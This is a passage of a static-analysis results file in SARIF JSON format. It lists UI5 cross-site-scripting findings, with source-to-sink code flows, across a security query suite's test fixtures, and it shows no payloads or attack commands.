}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442},"region":{"startLine":14,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":27,"startColumn":36,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"8ceecee7055f4fa2:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":26,"startColumn":25,"endColumn":42}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":26,"startColumn":17,"endColumn":22}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":27,"startColumn":36,"endColumn":41}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":26,"startColumn":25,"endColumn":42}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471},"region":{"startLine":26,"startColumn":25,"endColumn":42}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":32,"startColumn":30,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2550a22178eb38c8:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":11,"endColumn":16}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":27,"startColumn":56,"endColumn":61}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":27,"startColumn":45,"endColumn":63}},"message":{"text":"{ message: value }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":30,"startColumn":34,"endColumn":39}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":32,"startColumn":30,"endColumn":35}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":32,"startColumn":30,"endColumn":43}},"message":{"text":"model.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":19,"endColumn":36}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":32,"startColumn":30,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2550a22178eb38c8:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":11,"endColumn":16}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":27,"startColumn":56,"endColumn":61}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":27,"startColumn":45,"endColumn":63}},"message":{"text":"{ message: value }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":30,"startColumn":34,"endColumn":39}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":32,"startColumn":30,"endColumn":35}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":32,"startColumn":30,"endColumn":43}},"message":{"text":"model.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":19,"endColumn":36}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":26,"startColumn":30,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2550a22178eb38c8:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":19,"endColumn":36}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":11,"endColumn":16}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":26,"startColumn":56,"endColumn":61}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":26,"startColumn":45,"endColumn":63}},"message":{"text":"{ message: value }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":24,"startColumn":34,"endColumn":39}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":26,"startColumn":30,"endColumn":35}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":26,"startColumn":30,"endColumn":43}},"message":{"text":"model.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":19,"endColumn":36}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":19,"endColumn":36}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":24,"startColumn":34,"endColumn":70}}}],"partialFingerprints":{"primaryLocationLineHash":"234e496dfa11f1:1","primaryLocationStartColumnFingerprint":"21"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":20,"startColumn":33,"endColumn":98}},"message":{"text":"Fragmen ... Value()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":20,"startColumn":17,"endColumn":30}},"message":{"text":"sAttackerData"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":24,"startColumn":45,"endColumn":58}},"message":{"text":"sAttackerData"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":24,"startColumn":34,"endColumn":70}},"message":{"text":"\"<span> ... /span>\""}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":20,"startColumn":33,"endColumn":98}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494},"region":{"startLine":20,"startColumn":33,"endColumn":98}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":546},"region":{"startLine":8,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"353ad97f4bff4eae:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":550},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":549},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":544},"region":{"startLine":5,"startColumn":15,"endColumn":33}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":546},"region":{"startLine":8,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":550},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":550},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":571},"region":{"startLine":8,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"353ad97f4bff4eae:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":577},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":573},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":572},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":571},"region":{"startLine":8,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":577},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":577},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":582},"region":{"startLine":8,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"353ad97f4bff4eae:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":580},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":582},"region":{"startLine":8,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":14,"startColumn":51,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"45151c760b4bd849:1","primaryLocationStartColumnFingerprint":"38"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"window. ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":29,"endColumn":72}},"message":{"text":"new URL ... search)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":17,"endColumn":26}},"message":{"text":"oUrlQuery"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":34,"endColumn":43}},"message":{"text":"oUrlQuery"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":34,"endColumn":58}},"message":{"text":"oUrlQue ... yload\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":11,"startColumn":17,"endColumn":31}},"message":{"text":"sRemotePayload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":14,"startColumn":61,"endColumn":75}},"message":{"text":"sRemotePayload"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":14,"startColumn":51,"endColumn":86}},"message":{"text":"\"<div>\" ... </div>\""}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":21,"startColumn":22,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"93df5ec84a8a106e:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":18,"startColumn":20,"endColumn":30}},"message":{"text":"/input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":21,"startColumn":22,"endColumn":32}},"message":{"text":"/input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":18,"startColumn":20,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559},"region":{"startLine":18,"startColumn":20,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":8,"startColumn":5,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"74b35e217af6aa05:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":8,"startColumn":5,"endColumn":50}},"message":{"text":"content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided 